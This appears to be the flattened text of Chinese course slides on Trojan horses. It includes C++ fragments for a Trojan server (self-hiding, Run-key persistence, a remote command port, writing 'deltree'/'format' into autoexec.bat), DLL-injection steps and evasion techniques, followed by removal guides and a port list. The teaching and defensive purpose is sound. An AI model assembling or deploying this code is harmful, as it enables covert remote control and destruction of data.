一種特殊的病毒——特洛伊木馬

（Trojanhorse）第六章特洛伊木馬《特洛伊木馬》電影圖片第六章特洛伊木馬本章的學習目標掌握特洛伊木馬的概念了解木馬技術(shù)的發(fā)展趨勢掌握木馬開發(fā)實例理解木馬的關(guān)鍵技術(shù)掌握木馬攻擊的方法掌握木馬防范方法第六章特洛伊木馬章節(jié)主要內(nèi)容1木馬的概述2木馬程序的開發(fā)實例3木馬程序的關(guān)鍵技術(shù)4木馬攻擊的清除及其相關(guān)經(jīng)驗5木馬檢測及清除代碼第六章特洛伊木馬特洛伊木馬(TrojanHorse)是一種與遠程計算機之間建立起連接，使遠程計算機能夠通過網(wǎng)絡(luò)控制用戶計算機系統(tǒng)并且可能造成用戶的信息損失、系統(tǒng)損壞甚至癱瘓的程序。木馬的組成硬件：控制端、服務(wù)端、Internet軟件：控制端程序、木馬程序、木馬配置程序連接：控制、服務(wù)端IP,控制、服務(wù)端Port第六章特洛伊木馬流行木馬的基本特征1、隱蔽性是其首要的特征木馬和遠程控制軟件的最主要區(qū)別不產(chǎn)生圖標不出現(xiàn)在任務(wù)管理器中。2、它具有自動運行性啟動文件、啟動組、注冊表第六章特洛伊木馬3、木馬程序具有欺騙性名字方式：字母“l(fā)”與數(shù)字“1”、字母“o”與數(shù)字“0”相同文件名但不同路徑常用圖標：Zip4、具備自動恢復(fù)功能(高級技術(shù))5、能自動打開特別的端口6、功能的特殊性搜索緩存中的口令、設(shè)置口令、掃描目標機器的IP地址、進行鍵盤記錄、遠程注冊表的操作、以及鎖定鼠標等功能7、黑客組織趨于公開化第六章特洛伊木馬木馬的分類

1、遠程控制型木馬BO和冰河2、發(fā)送密碼型木馬3、鍵盤紀錄型木馬4、破壞型木馬5、FTP型木馬第六章特洛伊木馬遠程控制、木馬與病毒木馬和控制軟件目的不同有些木馬具有控制軟件的所有功能是否隱藏木馬和普通病毒傳播性（木馬不如病毒）兩者相互融合木馬程序YAI采用了病毒技術(shù)“紅色代碼”病毒已經(jīng)具有木馬的遠程控制功能第六章特洛伊木馬木馬的發(fā)展方向

1、跨平臺性2、模塊化設(shè)計3、更新更強的感染模式4、即時通知5、更強更多的功能第六章特洛伊木馬2木馬程序的開發(fā)實例第六章特洛伊木馬編程語言選擇以CSocket為基類生成CMySocket類。CMySocket類的功能是用來使本程序變成一個服務(wù)器程序。第六章特洛伊木馬自動隱藏//Win9x隱藏技術(shù)

DWORDdwVersion=GetVersion(); //得到操作系統(tǒng)的版本號

if(dwVersion>=0x80000000) //操作系統(tǒng)是Win9x,不是WinNt { typedefDWORD(CALLBACK*LPREGISTERSERVICEPROCESS)(DWORD,DWORD); //定義RegisterServiceProcess()函數(shù)的原型

HINSTANCEhDLL; LPREGISTERSERVICEPROCESSlpRegisterServiceProcess; hDLL=LoadLibrary("KERNEL32.dll"); //加載RegisterServiceProcess()函數(shù)所在的動態(tài)鏈接庫KERNEL32.DLL lpRegisterServiceProcess=(LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess"); //得到RegisterServiceProcess()函數(shù)的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1); //執(zhí)行RegisterServiceProcess()函數(shù),隱藏本進程

FreeLibrary(hDLL); //卸載動態(tài)鏈接庫

}第六章特洛伊木馬用RegisterServiceProcess函數(shù)實現(xiàn)后臺服務(wù)進程。未公開核心函數(shù)WinNT\2K下怎么實現(xiàn)？第六章特洛伊木馬自動加載木馬的第一次執(zhí)行如何實現(xiàn)第一次以后的自動加載？注冊表代碼功能：HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\%System%\\Tapi32第六章特洛伊木馬CopyFile(commandline,SystemPath+"\\Tapi32.exe",FALSE);//將自己拷貝到%System%目錄下,并改名為Tapi32.exe,偽裝起來registry->Open(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run");registry->QueryValue(TempPath,"crossbow",&lRegLength);

registry->SetValue(SystemPath+"\\Tapi32.exe","crossbow");第六章特洛伊木馬Server端功能——命令接收

接下來就是啟動Server端的Socket來接收客戶端的命令。Port777核心代碼：pSocket->Receive(lpBuf,1000); //接收客戶端數(shù)據(jù)

if(strnicmp(lpBuf,"CMD:",4)==0){ ExecuteCommand(lpBuf,FALSE); }//執(zhí)行遠端應(yīng)用程序

elseif(strnicmp(lpBuf,"!SHUT",5)==0){ SendText("Exitprogram!",pSocket); OnExit(); }//退出木馬程序第六章特洛伊木馬將要實現(xiàn)的功能：CMD執(zhí)行應(yīng)用程序!SHUT退出木馬獲得遠端文件EDITCONF編輯配置文件LIST列目錄VIEW察看文件內(nèi)容CDOPEN關(guān)CDCDCLOSE開CDREBOOT重啟遠端機器第六章特洛伊木馬Server端功能——修改配置Autoexec.bat和Config.sys代碼：_chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);_chmod("c:\\config.sys",S_IREAD|S_IWRITE);fwrite(content,sizeof(char),strlen(content),fp);//寫入添加的語句，例如deltree-yC:或者format–qC:第六章特洛伊木馬Server端功能——實現(xiàn)list命令Cfinder; BOOLbWorking=finder.FindFile("*.*"); while(bWorking) //循環(huán)得到下一層文件或目錄

{ bWorking=finder.FindNextFile(); if(finder.IsDots()||finder.IsDirectory()){ strResult="Dire:"; }else{ strResult="File:"; } strResult+=finder.Get(); strResult+="\n"; }

SendText(strResult,pSocket); //返回Return_Text變量的內(nèi)容第六章特洛伊木馬Server端功能——實現(xiàn)View命令intRead_Num=fread(temp_content,1,300,fp); //從目標文件中讀入前300個字符

while(Read_Num==300) { strResult+=(CString)temp_content; //strResult的內(nèi)容加上剛才的字符

for(inti=0;i<300;i++)temp_content[i]='\0'; Read_Num=fread(temp_content,1,300,fp); //重復(fù)

};第六章特洛伊木馬Server端功能——操作硬件mciSendString（“setcdaudiodooropen”，NULL，0，NULL）;

//彈出光驅(qū)的托盤mciSendString（"Setcdaudiodoorclosedwait"，NULL，0，NULL）;

//收入光驅(qū)的托盤第六章特洛伊木馬Server端功能——遠程reboot//Win9x重啟ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);//操作系統(tǒng)是WinNtOpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken);LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount=1;tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);第六章特洛伊木馬Client端功能客戶端的任務(wù)僅僅是發(fā)送命令和接收反饋信息而以。首先，在VisualStudio環(huán)境下新建一個基于Dialog的應(yīng)用程序；接著，在這個窗體上放置一些控件。這些控件用于輸入IP，Port，命令以及執(zhí)行某些動作。最后，添加CCommandSocket類（其基類是CSocket類）到當前工程，該類用于和Server端通訊。第六章特洛伊木馬發(fā)送命令的代碼如下：m_ptrComSocket->Send((void*)m_msg,m_msg.GetLength());從服務(wù)器端獲取反饋信息ReceiveResult(m_msg);斷開Socket通訊的代碼如下：m_ptrComSocket->Close();代碼及演示第六章特洛伊木馬下列問題就值得仔細考慮：首先是程序的大小問題；還有啟動方式的選擇；木馬的功能還可以大大擴充；殺掉防火墻和殺毒軟件；針對來自反匯編工具的威脅；自動卸載等。第六章特洛伊木馬3木馬程序的關(guān)鍵技術(shù)木馬程序技術(shù)發(fā)展的4個階段：第一階段主要實現(xiàn)簡單的密碼竊取、發(fā)送等功能，沒有什么特別之處。第二階段在技術(shù)上有了很大的進步，主要體現(xiàn)在隱藏、控制等方面。國內(nèi)冰河可以說是這個階段的典型代表之一。第三階段在數(shù)據(jù)傳遞技術(shù)上做了不小的改進，出現(xiàn)了基于ICMP協(xié)議的木馬，這種木馬利用ICMP協(xié)議的畸形報文傳遞數(shù)據(jù)，增加了查殺的難度。第四階段在進程隱藏方面做了非常大的改動，采用了內(nèi)核插入式的嵌入方式，利用遠程插入線程技術(shù)嵌入DLL線程，或者掛接PSAPI實現(xiàn)木馬程序的隱藏。即使在WindowsNT/2K下，這些技術(shù)都達到了良好的隱藏效果。相信，第五代木馬的技術(shù)更加先進。第六章特洛伊木馬Socket技術(shù)第六章特洛伊木馬第六章特洛伊木馬第六章特洛伊木馬重要的系統(tǒng)文件win.ini文件中的啟動加載項：[windwos]段中有如下加載項：run=Load=system.ini中的啟動加載項：在[BOOT]子項中的“Shell”項：shell=第六章特洛伊木馬修改注冊表HKEY_CLASSES_ROOT：此處存儲的信息可以確保當使用Windows資源管理器打開文件時，將使用正確的應(yīng)用程序打開對應(yīng)的文件類型。HKEY_CURRENT_USER：存放當前登錄用戶的有關(guān)信息。用戶文件夾、屏幕顏色和“控制面板”設(shè)置存儲在此處。該信息被稱為用戶配置文件。HKEY_LOCAL_MACHINE：包含針對該計算機（對于任何用戶）的配置信息。HKEY_USERS：存放計算機上所有用戶的配置文件。HKEY_CURRENT_CONFIG：包含本地計算機在系統(tǒng)啟動時所用的硬件配置文件信息。HKEY_DYN_DATA：記錄系統(tǒng)運行時刻的狀態(tài)。第六章特洛伊木馬(Run),(RunOnce),(RunOnceEx),(RunServices),(RunServicesOnce)20多個API函數(shù)第六章特洛伊木馬修改文件關(guān)聯(lián)當你打開了一個已修改了打開關(guān)聯(lián)的文件時，木馬也就開始了它的運作。選擇文件格式中的“打開”、“編輯”、“打印”項目。例如冰河木馬病毒[HKEY_CLASSES_ROOT\txtfile\shell\open\command]中的鍵值“c:\windows\notepad.exe%1”，改為“sysexplr.exe%1”。第六章特洛伊木馬遠程屏幕抓取如果鍵盤和鼠標事件記錄不能滿意時，需要抓取被控制端屏幕，形成一個位圖文件，然后把該文件發(fā)送到控制端計算機顯示出來。第六章特洛伊木馬輸入設(shè)備控制通過網(wǎng)絡(luò)控制目標機的鼠標和鍵盤，以達到模擬鼠標和鍵盤的功能。使用技術(shù)：Keybd_event，mouse_event//模擬A鍵按鍵過程keybd_event(65,0,0,0);keybd_event(65,0,KEYEVENTF_KEYUP,0);第六章特洛伊木馬//模擬按下左鍵GetCursorPos(&lpPoint);SetCursorPos(lpPoint.x,lpPoint.y);mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);第六章特洛伊木馬遠程文件管理操作目標機文件的方式通常有兩種：一種是共享目標機的硬盤，進行任意的文件操作；另一種是把自己的計算機配置為FTP（Protocol，文件傳輸協(xié)議）服務(wù)器。使用函數(shù)CInternetSessionGetGetFilePutFile第六章特洛伊木馬共享硬盤數(shù)據(jù)Windows2000/NT/XP: [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\Shares]Windows9x:[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan]"Flags"

//類型"Path"

//目錄"Remark"

//備注"Type""Parm1enc""Parm2enc"第六章特洛伊木馬隱藏技術(shù)——反彈式木馬技術(shù)定義：利用防火墻對內(nèi)部發(fā)起的連接請求無條件信任的特點，假冒是系統(tǒng)的合法網(wǎng)絡(luò)請求來取得對外的端口，再通過某些方式連接到木馬的客戶端，從而竊取用戶計算機的資料同時遙控計算機本身。第六章特洛伊木馬反彈式木馬訪問客戶端的80端口，防火墻無法限制。例如，“網(wǎng)絡(luò)神偷”防范：使用個人防火墻，其采用獨特的“內(nèi)墻”方式應(yīng)用程序訪問網(wǎng)絡(luò)規(guī)則。第六章特洛伊木馬隱藏技術(shù)——用ICMP方法隱藏連接TCPUDP木馬的弱點：等待和運行的過程中，始終有一個和外界聯(lián)系的端口打開著。原理：由于ICMP報文是由系統(tǒng)內(nèi)核或進程直接處理而不是通過端口，這就給木馬一個擺脫端口的絕好機會。木馬將自己偽裝成一個Ping的進程，系統(tǒng)就會將ICMP_ECHOREPLY（Ping的回包）的監(jiān)聽、處理權(quán)交給木馬進程。一旦事先約定好的ICMP_ECHOREPLY包出現(xiàn)（可以判斷包大小、ICMP_SEQ等特征），木馬就會接受、分析并從報文中解碼出命令和數(shù)據(jù)。即使防火墻過濾ICMP報文，一般也不過率ICMP_ECHOREPLY包，否則就不能進行Ping操作了。因此，具有對于防火墻和網(wǎng)關(guān)的穿透能力。第六章特洛伊木馬隱藏技術(shù)——隱藏端口為了隱藏端口，采用兩種思路：寄生和潛伏寄生就是找一個已經(jīng)打開的端口，寄生其上，平時只是監(jiān)聽，遇到特殊的指令就進行解釋執(zhí)行。潛伏是說使用IP協(xié)議族中的其它協(xié)議而不是TCP或UDP來進行通訊，從而瞞過Netstat和端口掃描軟件。一種比較常見的潛伏手段是使用ICMP協(xié)議。其他方法：對網(wǎng)卡或Modem進行底層的編程。第六章特洛伊木馬隱藏技術(shù)——NT進程的隱藏進程和端口聯(lián)系在一起的方法很常見。因此，需要隱藏進程來達到隱藏木馬的目的。實現(xiàn)進程隱藏有兩種思路：第一是讓系統(tǒng)管理員看不見（或者視而不見）你的進程；第二是不使用進程。第六章特洛伊木馬能否使用第一種方式？在Windows中有多種方法能夠看到進程的存在：PSAPI（ProcessStatusAPI）；PDH（PerformanceDataHelper）；ToolHelpAPI。如果我們能夠欺騙用戶和入侵檢測軟件用來查看進程的函數(shù)（例如截獲相應(yīng)的API調(diào)用，替換返回的數(shù)據(jù)），我們就完全能實現(xiàn)進程隱藏。但是存在兩個難題：一來我們并不知道用戶和入侵軟件使用的是什么方法來查看進程列表；二來如果我們有權(quán)限和技術(shù)實現(xiàn)這樣的欺騙，我們就一定能使用其它的方法更容易的實現(xiàn)進程的隱藏。第六章特洛伊木馬使用第二種方式最流行。DLL是Windows系統(tǒng)的另一種“可執(zhí)行文件”。DLL文件是Windows的基礎(chǔ)，因為所有的API函數(shù)都是在DLL中實現(xiàn)的。DLL文件沒有程序邏輯，是由多個功能函數(shù)構(gòu)成，它并不能獨立運行，一般都是由進程加載并調(diào)用的。假設(shè)我們編寫了一個木馬DLL，并且通過別的進程來運行它，那么無論是入侵檢測軟件還是進程列表中，都只會出現(xiàn)那個進程而并不會出現(xiàn)木馬DLL，如果那個進程是可信進程，（例如資源管理器Explorer.exe，沒人會懷疑它是木馬吧？）那么我們編寫的DLL作為那個進程的一部分，也將成為被信賴的一員而為所欲為。第六章特洛伊木馬用DLL實現(xiàn)木馬功能 用DLL實現(xiàn)木馬功能，然后，用其他程序啟動該DLL.有三種方式：最簡單的方式——RUNDLL32特洛伊DLL線程插入技術(shù)第六章特洛伊木馬最簡單的方式——RUNDLL32Rundll32DllFuncNameRundll32.exeMyDll.dllMyFunc程序演示(參見：..\othercode\testdll)第六章特洛伊木馬比較高級的方式－特洛伊DLL

特洛伊DLL（欺騙DLL）的工作原理是使用欺騙DLL替換常用的DLL文件，通過函數(shù)轉(zhuǎn)發(fā)器將正常的調(diào)用轉(zhuǎn)發(fā)給原DLL，截獲并處理特定的消息。函數(shù)轉(zhuǎn)發(fā)器forward的認識。VisualStudio7命令提示符>dumpBin-Exportsc:\windows\system32\Kernel32.dll|more演示程序?qū)崿F(xiàn)//FunctionforwarderstofunctionsinDllWork#pragmacomment(linker,"/export:ForwardFunc=Kernel32.HeapCreate")演示（參見：..\othercode\testdll源代碼）第六章特洛伊木馬實現(xiàn)描述我們知道WINDOWS的Socket1.x的函數(shù)都是存放在wsock32.dll中的，那么我們自己寫一個wsock32.dll文件，替換掉原先的wsock32.dll（將原先的DLL文件重命名為wsockold.dll）我們的wsock32.dll只做兩件事，一是如果遇到不認識的調(diào)用，就直接轉(zhuǎn)發(fā)給wsockold.dll（使用函數(shù)轉(zhuǎn)發(fā)器forward）；二是遇到特殊的請求（事先約定的）就解碼并處理。第六章特洛伊木馬特洛伊DLL的弱點：system32目錄下有一個dllcache的目錄，這個目錄中存放著大量的DLL文件，一旦操作系統(tǒng)發(fā)現(xiàn)被保護的DLL文件被篡改（數(shù)字簽名技術(shù)），它就會自動從dllcache中恢復(fù)這個文件。有些方法可以繞過dllcache的保護：先更改dllcache目錄中的備份再修改DLL文件利用KnownDLLs鍵值更改DLL的默認啟動路徑等同時特洛伊DLL方法本身也有一些漏洞（例如修復(fù)安裝、安裝補丁、升級系統(tǒng)、檢查數(shù)字簽名等方法都有可能導(dǎo)致特洛伊DLL失效），所以這個方法也不能算是DLL木馬的最優(yōu)選擇。第六章特洛伊木馬最高級方式——動態(tài)嵌入技術(shù)DLL木馬的最高境界是動態(tài)嵌入技術(shù)，動態(tài)嵌入技術(shù)指的是將自己的代碼嵌入正在運行的進程中的技術(shù)。多種嵌入方式：窗口Hook、掛接API、遠程線程。第六章特洛伊木馬隱藏技術(shù)——遠程線程技術(shù)遠程線程技術(shù)指的是通過在另一個進程中創(chuàng)建遠程線程的方法進入那個進程的內(nèi)存地址空間。通過CreateRemoteThread也同樣可以在另一個進程內(nèi)創(chuàng)建新線程，新線程同樣可以共享遠程進程的地址空間。第六章特洛伊木馬HANDLECreateRemoteThread(HANDLEhProcess,PSECURITY_ATTRIBUTESpsa,DWORDdwStackSize,PTHREAD_START_ROUTINEpfnStartAddr,PVOIDpvParam,DWORDfdwCreate,PDWORDpdwThreadId);一個地址第六章特洛伊木馬DWORDWINAPIThreadFunc(PVOIDpvParam);HINSTANCELoadLibrary(PCTSTRpszLibFile);兩個函數(shù)非常類似第六章特洛伊木馬需解決的問題：第一個問題，獲取LoadLibrary的實際地址。PTHREAD_START_ROUTINEpfnThreadRtn=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");第二個問題，把DLL路徑名字符串放入宿主進程。使用：VirtualAllocEx，VirtualFreeEx，ReadProcessMemory，WriteProcessMemory等函數(shù)。第六章特洛伊木馬操作步驟做一個歸納：1)使用VirtualAllocEx函數(shù)，分配遠程進程的地址空間中的內(nèi)存。2)使用WriteProcessMemory函數(shù)，將DLL的路徑名拷貝到第一個步驟中已經(jīng)分配的內(nèi)存中。3)使用GetProcAddress函數(shù)，獲取LoadLibraryA或LoadLibratyW函數(shù)的實地址（在Kernel32.dll中）。4)使用CreateRemoteThread函數(shù)，在遠程進程中創(chuàng)建一個線程，它調(diào)用正確的LoadLibrary函數(shù)，為它傳遞第一個步驟中分配的內(nèi)存的地址。第六章特洛伊木馬5)使用VirtualFreeEx函數(shù)，釋放第一個步驟中分配的內(nèi)存。6)使用GetProcAddress函數(shù)，獲得FreeLibrary函數(shù)的實地址（在Kernel32.dll中）。7)使用CreateRemoteThread函數(shù)，在遠程進程中創(chuàng)建一個線程，它調(diào)用FreeLibrary函數(shù)，傳遞遠程DLL的HINSTANCE。看代碼及演示（參見:..\othercode\injlib和Imgwalk）第六章特洛伊木馬服務(wù)器端程序的包裝與加密一個試驗:text.txt，其內(nèi)容為“Thisisfortest!!”C:\>typetext.txt>>Test.exe運行Test.exe演示（參見：..\othercoe\bindexe）木馬會把一些配置信息放在exe文件的最后。例如，冰河木馬第六章特洛伊木馬4木馬攻擊的方法及相關(guān)經(jīng)驗1木馬病毒的常用騙術(shù)

2全面防治木馬病毒

3幾種常見木馬病毒的殺除方法

4已知木馬病毒的端口列表第六章特洛伊木馬木馬病毒的常用騙術(shù)1.修改批處理Autoexec.bat(自動批處理，在引導(dǎo)系統(tǒng)時執(zhí)行)

Winstart.bat(在啟動GUI圖形界面環(huán)境時執(zhí)行)

Dosstart.bat(在進入MS-DOS方式時執(zhí)行)

2.修改系統(tǒng)配置System.iniWin.ini第六章特洛伊木馬3.借助自動運行功能根目錄下新建一個Autorun.inf

[autorun]

open=Notepad.exe

4.通過注冊表中的Run來啟動

5.通過文件關(guān)聯(lián)啟動6.通過APIHOOK啟動利用經(jīng)常使用的API啟動木馬第六章特洛伊木馬7.通過VXD啟動寫成Vxd并寫入[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD]8.通過瀏覽網(wǎng)頁啟動利用MIME的漏洞。9.利用Javaapplet10.利用系統(tǒng)自動運行的程序例如，ScanDisk等程序，在一定情況下，系統(tǒng)會自動啟動它們。第六章特洛伊木馬全面防治木馬病毒1木馬中毒現(xiàn)象2發(fā)現(xiàn)和殺除木馬的方法進程/內(nèi)存模塊查看器在Windows下查看進程/內(nèi)存模塊的方法很多，有PSAPI、PDH和ToolHelperAPI。http://端口掃描（端口進程關(guān)聯(lián)軟件）關(guān)聯(lián)端口和進程的軟件也是重要的工具之一，雖然DLL木馬隱藏在其他進程中，但是多多少少會有一些異常，功能強大的Fport就是一個優(yōu)秀的進程端口關(guān)聯(lián)軟件，可以在以下地址下載到：

http://=FPortNG.zip嗅探器嗅探器幫助我們發(fā)現(xiàn)異常的網(wǎng)絡(luò)通訊，從而引起我們的警惕和關(guān)注，嗅探器的原理很簡單，通過將網(wǎng)卡設(shè)為混雜模式就可以接受所有的IP報文，嗅探程序可以從中選擇值得關(guān)注的部分進行分析，剩下的無非是按照RFC文檔對協(xié)議進行解碼。代碼及頭文件：

http://

編譯后的程序：

http://第六章特洛伊木馬檢查及保護注冊表http://查找文件http://

殺病毒軟件系統(tǒng)文件檢查器第六章特洛伊木馬3木馬的預(yù)防措施1.永遠不要執(zhí)行任何來歷不明的軟件或程序2.永遠不要相信你的郵箱不會收到垃圾和病毒3.永遠不要因為對方是你的好朋友就輕易執(zhí)行他發(fā)過來的軟件或程序。4.千萬不要隨便留下你的個人資料。5.千萬不要輕易相信網(wǎng)絡(luò)上認識的新朋友。6.永遠不要隨便說別人的壞話，防止別人用木馬報復(fù)你。第六章特洛伊木馬幾種常見木馬病毒的殺除方法一、BO2000查看注冊表［HEKY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicse］中是否存在Umgr32.exe的鍵值。有則將其刪除。重新啟動電腦，并將\Windows\System中的Umgr32.exe刪除。

第六章特洛伊木馬二、NetSpy（網(wǎng)絡(luò)精靈）

國產(chǎn)木馬，默認連接端口為7306。在該版本中新添加了注冊表編輯功能和瀏覽器監(jiān)控功能，客戶端現(xiàn)在可以不用NetMonitor，通過IE或Navigate就可以進行遠程監(jiān)控了。其強大之處絲毫不遜色于冰河和BO2000！服務(wù)端程序被執(zhí)行后，會在C:\Windows\system目錄下生成netspy.exe文件。同時在注冊表［HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run］下建立鍵值C:\windows\system\netspy.exe，用于在系統(tǒng)啟動時自動加載運行。

清除方法：

1.進入dos，在C:\windows\system\目錄下輸入以下命令：delnetspy.exe回車；

2.進入注冊表HKEY_LOCAL_MACHINE\Software\microsoft\windows\CurrentVersion\Run\，刪除Netspy.exe和Spynotify.exe的鍵值即可安全清除Netspy。

第六章特洛伊木馬三、Happy99

此程序運行時，會在打開一個名為“Happynewyear1999”的窗口，并出現(xiàn)美麗的煙花，它會復(fù)制到Windows主文件夾的System目錄下并更名為Ska.exe，同時創(chuàng)建文件Ska.dll，修改Wsock32.dll，將修改前的文件備份為Wsock32.ska，并修改注冊表。另外，用戶可以檢查注冊［HEKY_LOCAL_MACHINE\Softwre\Microsoft\Windows\CurrentVersion\RunOnce］中有無鍵值Ska.exe。有則將其刪除，并刪除\Windows\System中的Ska.exe和Ska.dll兩個文件，將Wsock32.ska更名為Wscok32.dll。

第六章特洛伊木馬四、冰河

冰河標準版的服務(wù)器端程序為G-server.exe，客戶端程序為G-client.exe，默認連接端口為7626。一旦運行G-server，那么該程序就會在C:\Windows\system目錄下生成Kernel32.exe和sysexplr.exe并刪除自身。Kernel32.exe在系統(tǒng)啟動時自動加載運行，sysexplr.exe和TXT文件關(guān)聯(lián)。即使你刪除了Kernel32.exe，但只要你打開TXT文件，sysexplr.exe就會被激活，它將再次生成Kernel32.exe，于是冰河又回來了！這就是冰河屢刪不止的原因。

清除方法：

用純DOS啟動進入系統(tǒng)（以防木馬的自動恢復(fù)），刪除你安裝的windows下的system\kernel32.exe和system\sysexplr.exe兩個木馬文件，注意如果系統(tǒng)提示你不能刪除它們，則因為木馬程序自動設(shè)置了這兩個文件的屬性，我們只需要先改掉它們的隱藏、只讀屬性，就可以刪除。刪除后，進入windows系統(tǒng)進入注冊表中，找到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]兩項，然后查找kernel32.exe和sysexplr.exe兩個鍵值并刪除。再找到[HKEY_CLASSES_ROOT\txtfile\open\command]，看在鍵值中是不是已改為“sysexplr.exe%1”，如是改回“notepad.exe%1”。第六章特洛伊木馬五、Nethief(網(wǎng)絡(luò)神偷)

這是反彈端口型木馬的典型代表。大多數(shù)的防火墻對于由外面連入本機的連接往往會進行非常嚴格的過濾，但是對于由本機連出的連接卻疏于防范（當然也有的防火墻兩方面都很嚴格）。于是，與一般的木馬相反，反彈端口型木馬的服務(wù)端(被控制端)使用主動端口，客戶端(控制端)使用被動端口，當要建立連接時，由客戶端通過FTP主頁空間告訴服務(wù)端：“現(xiàn)在開始連接我吧！”，并進入監(jiān)聽狀態(tài)，服務(wù)端收到通知后，就會開始連接客戶端。為了隱蔽起見，客戶端的監(jiān)聽端口一般開在80，這樣，即使用戶使用端口掃描軟件檢查自己的端口，發(fā)現(xiàn)的也是類似“TCP服務(wù)端的IP地址:1026客戶端的IP地址:80ESTABLISHED”的情況，稍微疏忽一點你就會以為是自己在瀏覽網(wǎng)頁。防火墻也會如此認為，大概沒有哪個防火墻會不給用戶向外連接80端口吧。

清除方法：

1.網(wǎng)絡(luò)神偷會在注冊表［HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run］下建立鍵值“internet”，其值為"internet.exe/s"，將鍵值刪除；

2.刪除其自啟動程序C:\WINDOWS\SYSTEM\INTERNET.EXE。第六章特洛伊木馬已知木馬病毒的端口列表木馬名稱端口木馬名稱端口BOjammerkillahV121RemoteGrab7000NukeNabber139NetMonitor7300HackersParadise456NetMonitor1.x7301StealthSpy555NetMonitor2.x7306Phase0555NetMonitor3.x7307NeTadmin555NetMonitor4.x7308SatanzBackdoor666Qaz7597AttackFTP666ICQKiller7789AIMSpy777InCommand9400第六章特洛伊木馬木馬檢測及清除實驗示例程序利用開放主機端口號和各個木馬程序使用端口的對應(yīng)關(guān)系，判斷主機是否已中木馬，中了何種木馬（目前能查找一百余種），并能根據(jù)所中木馬的類型，對其中的二十幾種進行殺滅。此外，用戶可自行追加數(shù)據(jù)庫，增加能查找病毒的種類。第六章特洛伊木馬開始讀取保存開放端口文件，判斷中何木馬是否能打開木馬數(shù)據(jù)庫文件No